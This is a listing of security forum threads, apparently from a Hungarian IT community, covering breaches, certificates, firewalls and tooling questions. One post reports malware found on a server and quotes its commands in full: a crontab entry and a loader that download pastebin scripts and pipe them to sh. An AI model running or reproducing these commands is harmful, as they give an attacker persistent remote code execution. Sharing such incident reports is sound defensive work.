Security-all

Biztonsági kamera kezelése Linux serveren

 ( kalmarr | 2019. április 17., szerda - 20:00 )

Sziasztok,

szeretném a segítségeteket kérni abban, hogy milyen alternatívái vannak a biztonsági kamera szoftvereknek Linux rendszeren.
A nagy kérdésem, hogy pl: Synlogic minőségű rendszer - https://www.synology.com/hu-hu/surveillance - elérhetőe-e Linuxon, azaz ha készítek egy NAS szerver-t, akkor pl: ilyen szoftvert tudok-e valahol találni rá? Ami hasonló módon és képeségekkel megbírkozik a feladattal, vagy inkább válasszak inkább egy "kész" NAS szervert, mert nem lesz ilyen jellegű megoldás sehol...

Köszönöm előre is!

Kalmi

Pastebin, mint rootkit store

 ( _Franko_ | 2019. április 13., szombat - 15:18 )

Egyik szerveremen találtam.

Beleírja magát a cron-ba:

echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh" | crontab -

Majd ezt futtatva lehozza magát újra és újra:

(curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh

Letölt ezt-azt, futtat ezt-azt.

OTP

 ( efel | 2019. április 10., szerda - 22:12 )

https://www.otpbank.hu/portal/hu/JogiEtikaiNyilatkozat

Legalul:

Az OTP Bank Nyrt. által működtetett informatikai rendszer megfelel a 42/2015 (III.12.) Kormányrendeletben meghatározott zárt informatikai rendszer követelményeinek. A tanúsítvány regisztrációs száma: HUNG-T-ZART-389-2018

A Tanúsítvány érvényességének kezdete: 2018. március 31.

A Tanúsítvány érvényességének vége: 2019. március 31. <====

Feedback wanted: CScanner (Cloud Security Scanner)

 ( janoszen | 2019. március 28., csütörtök - 10:07 )

Kedves HuP közönség,

Tegnap kicsit fölbosszantottam magam egy security incidensen és azon melegében elkezdtem összerakni egy kis eszközt a probléma orvoslására. Eljutott olyan fázisba (van doksi, stb) hogy elétek bocsájssam visszajelzés céljából.

Forrás kód: https://github.com/janoszen/cscanner
Doksi: https://cscanner.io

Igen, Javaban van írva, a GoLang továbbra sem barátom.

Most a ti véleményetekre vagyok kíváncsi: milyen szabálykészlettel bővítsem még az eszközt?

Köszönöm

János

mod-security fals pozitív?

 ( Proci85 | 2019. március 20., szerda - 17:02 )

Sziasztok

Cégen belül próbálkozom pár weboldalnál bekapcsolni, mert könnyebb apache szinten megfogni a csúnya postokat, mint php-ból. Utóbbi jobban pörgeti a CPU-t és több hibázási lehetőséget rejt.

A gond viszont az, hogy több false pozitív riasztást ad.
Pl. ha egy fájlt töltenek fel, OK, ha többet már riaszt a 200004 ID-s rule. Ezt a neten többé kevésbé kamunak veszik, kapcsoljam ki..oké.

Armor Games data breach

 ( _Franko_ | 2019. március 13., szerda - 10:15 )

Dear Armor Games Players,

We respect the privacy of our users which is why as a precautionary measure, we are writing to let you know of a data security incident that may involve your personal information.

Verifications.io leak

 ( hendrick | 2019. március 10., vasárnap - 13:12 )

In February 2019, the email address validation service verifications.io suffered a data breach. Discovered by Bob Diachenko and Vinny Troia, the breach was due to the data being stored in a MongoDB instance left publicly facing without a password and resulted in 763 million unique email addresses being exposed. Many records within the data also included additional personal attributes such as names, phone numbers, IP addresses, dates of birth and genders. No passwords were included in the data.

Samsung FRP eltávolítása

 ( plt | 2019. február 18., hétfő - 10:03 )

Örököltem egy Samsung Galaxy Tab S2 tabletet, ami factory reset után a FRP miatt nem használható. Sajnos a debug mód is ki volt kapcsolva a tabletben, így ADB alól sem elérhető.
A Samsung szerint szakszervíz aranyárban hajlandó használhatóvá tenni.
Van valakinek ennél jobb, gyorsabb, egyszerűbb, olcsóbb ötlete?

Kubernetes fail2ban alternativa

 ( kiuka | 2019. január 18., péntek - 22:09 )

Sziasztok,

egy ideje agyalok azon a kerdesen, hogy mikent tudnam a fail2ban altal elvegzett feladatot kubernetesbe atvinni.

Adott egy nginx container, ami lenyegeben egy loadbalancer, ez osztja tovabb a bejovo forgalmat httpd node-oknak. Jelenleg ez egy VS, amin fail2ban parseolja a logot es szur ki klienseket bizonyos tevekenysegekuk alapjan. Ezt szeretnem kubernetesbe rakni.

Jelenleg ket megoldast latok:
- a containeren belul futtatok fail2ban-t es nginxet is, ez szamomra nem igazan illik a konterizalt vilagkepbe, hisz egy container egy alkalmazas kene legyen

SSL certificate honnan

 ( zamek | 2018. december 18., kedd - 14:05 )

Sziasztok,

Céges szoftver fejlesztéshez szeretnék egy ssl tanusítványt szerezni (Docker image-ek push/pull saját registry-be, Sonarqube, Nexus repository stb.)
A self signed certificate-ekkel csak a szívás van, inkább áldozok rá, hogy legyen egy hiteles tanusítványom. Csak erre a célra akarom használni.
Hol érdemes venni, ha lehet nem túl drágán. Esetleg, ha cégesen drágább, akkor lehet-e magánemberként?

köszi,
Zamek

Milyen magyar tanúsítványkiállítót?

 ( nice | 2018. december 11., kedd - 11:06 )

Sziasztok!

Otthoni tuzfal - pcengines - apu2b4 - Gigabit pppoE

 ( lmarton | 2018. november 23., péntek - 13:56 )

Sziasztok !

Tanacsot szertenek kerni kinek milyen tapasztalata van es mit ajanlana tuzfalnak az otthoni halozatomra.
Digi Gigabit van optikai modem bridge modeban amit jelenleg egy PCengines apu2B4 - 4G ramos pfsense szolgal ki - sajnos nem tul jol.

Off-site biztonságos adattárolási szolgáltatás Magyarországon - like Swiss Trust Room

 ( VO2max | 2018. november 10., szombat - 12:22 )

Sziasztok /tiszteletem kedves Kollégák!

Ennek a megoldásnak keresem az alternatíváját elsősorban magyar szolgáltatónál:

https://www.swisscom.ch/en/business/enterprise/offer/security/swiss-trust-room.html

Nem feltétlenül kell az összes feature amit ez tud, de meg kell vizsgálnom az alternatív lehetőségeket.

Köszönöm szépen előre is a hozzászólásokat!

Üdv
VO2max

GovCERT "Tájékoztatás eseménykezelő központ feladatkörben eljárva" levelek

 ( trey | 2018. november 7., szerda - 18:28 )

GovCERT

A Nemzeti Kibervédelmi Intézet Kormányzati Eseménykezelő Központ elkezdett rendszeresen sérülékenységekre figyelmeztető leveleket küldeni a cégünk. Ezzel nincs is semmi baj, csak azt nem értem, hogy miért a gazdasági igazgatónkat találták meg ezzel, aki szemmel láthatóan azt sem tudja, hogy mit kezdjen vele. Nem is dolga ezekkel foglalkozni.

Tudunk valamit ezekről a levelekről? Más is kap ilyeneket? Hol kellett ezekre feliratkozni? Vagy esetleg hol iratkozhatott fel a nevezett igazgató ezekre?

Facebook accounts data for sale 81'000 profile free sample, 10 cent per account

 ( hendrick | 2018. november 2., péntek - 17:42 )

Apropo: https://www.bbc.com/news/technology-46065796
Valaki beleqkkantott? Tényleg kezd olyan érzésem lenni, hiába toldozzuk-foltozzuk ezt az IT-t, olyan minden ami elektronikusan van tárolva, mintha egy nyílt levelezőlapon küldözgetnénk. (elég ha a chatpartner egy ilyen príma böngészőbővítménnyel rendelkezik, te hiába vagy körültekintő)

NET::ERR_ CERT _ SYMANTEC_LEGACY első magyar áldozata

 ( kbalint | 2018. október 31., szerda - 11:18 )

Ma vettem észre, hogy enforce-olja az új policy-t a Chrome 70, és az aqua.hu-n eléggé rontja a vásárlási élményt a 2 laponkénti megállító oldal. Nem biztos, hogy ez a jó megoldás egy fizetett szolgáltatás, pláne egy webshop esetében, hogy a böngésző jobban tudja...

ESET Endpoint Encryption Pro

 ( blackberry | 2018. október 29., hétfő - 16:20 )

Használja valaki?
Tapasztalatok, vélemények?

Távmunka biztonságosan

 ( ne0 | 2018. október 25., csütörtök - 14:13 )

Céges környezetbe keresek olyan megoldást, amivel biztosítható az otthoni munkavégzés is: elérhessék a belső Windows 7 alapú gépeiket munkaidőben.

Fontos, hogy minden esetben biztosítsa a rendszer a felhasználó azonosítását, tehát ne lophassák el, ne adhassa tovább a hozzáférést.
Ismertek olyan megoldást, ami a böngészőkhöz hasonlóan "megjegyzi" milyen gépről csatlakoztak, és mondjuk 30 napig ott nem kér MFA-t, új gép esetén pedig először engedélyezni kell?

OnlyKey - tapasztalatok?

 ( lcsaszar | 2018. október 15., hétfő - 21:14 )

Sziasztok!

Van ezzel az eszközzel tapasztalata valakinek? Különösen a Yubikey-vel való összehasonlítás érdekelne.

https://onlykey.io/

kibertámadás bejelentése

 ( ShonoSF | 2018. október 4., csütörtök - 22:06 )

Üdv,

Épp DDoS alatt áll(t) rendszerem - szerencsére időben elcsíptem és blokkoltam az egész 5.188.211 subnetet. (from russia with love)
Azon tanakodtam, vajon hogyan, kinek lehetne/kellene jelenteni, ha ilyennel találkozik az ember. (a neten csak általánosan írnak "kibertámadás bejelentése" témakörben, hogy szóljak az ISP-nek, meg a hatóságnak stb - bármilyen nyelven. is.)
pl.: https://www.icann.org/news/blog/how-to-report-a-ddos-attack

OK, de konkrétan kinek?

PPTP VPN Mikrotik

 ( brainscan | 2018. október 1., hétfő - 15:26 )

Sziasztok!

Érdekelne, hogy mennyire rejt valós problémát 2018-ban használni pptp-ét egy Mikrotik routerrel. Valós veszély-e? Felfognak törni napokon belül...Mert olvastam csomót, hogy elavult, könnyen törhető stb. De azért pár dolognak összekell állni, hogy megtörténjen a feltörés...

Facebook - Megtekintés Mint hacker

 ( hajbazer | 2018. szeptember 29., szombat - 20:32 )

Zuckerbergéknél most nagyban főhetnek a fejek, ugyanis történt ezen a héten kedden vala, azaz 2018. szeptember 25-én, hogy a biztonsági szakértő(?)gárdájuk felfedezte több, mint 50 millió Facebook fiók kompromittációját, ráadásul egy igen kisstílű, rendkívül amatőr fejlesztési, tesztelési és reviewzási gyakorlatot a háttérben sejtető hibán keresztül.

ssh spontán javul - MITM?

 ( locsemege | 2018. szeptember 27., csütörtök - 22:10 )

Lokális otthoni hálózat egy OpenWrt/LEDE router-rel. Desktop gépről ssh-znék a notebook-omra, erre közli, hogy nem sikerült az autentikáció, vagy új kulcspár lett generálva, vagy man in the middle attack áldozata vagyok. Hirtelen az jutott eszembe, a desktop gépen upgrade-eltem oprendszert, azóta nem is próbáltam ssh-zni a notebook-ra. Aztán elméláztam azon, hogy egy oprendszer frissítésnek mi köze van a kulcsokhoz, pláne úgy, hogy a másik gépen nem történt változás.

kell nekem LetsEncrypt

 ( tselmeci | 2018. augusztus 23., csütörtök - 8:36 )

Szevasztok!

(előrebocsátom, hogy nem vagyok jártas a titkosítások terén)

Van egy kis szerverem, amin a következő fontosabb szolgáltatások futnak: SMTP, IMAP4, HTTP, FTP, mindez saját domain alatt.

Amikor SMTP-vel levelet küldök, akkor a levél minden esetben a szolgáltatóm smarthostja felé van továbbítva TLS kapcsolaton keresztül. Minden más esetben az összes szolgáltatás (SMTP auth levelezőprogramból, IMAP4 auth, HTTP, FTP) titkosítás nélkül megy. Tudom, nem jó.

3rdparty csomagok validalasa

 ( wladek1 | 2018. augusztus 22., szerda - 8:07 )

Sziasztok,

gondolom, sokan talalkoztatok mar azzal, hogy a fejleszto Kollegak composer/whatever csomagokat mindenfele validalas, security audit nelkul hasznalnak/hasznalnanak fel. Milyen megoldasokkal lehet szerintetek ezeket hatekonyan ellenorizni security szempontbol? Nyilvan guglizhatnek persze, de a tapasztalatok sokkal jobban erdekelnek :)

Koszi :)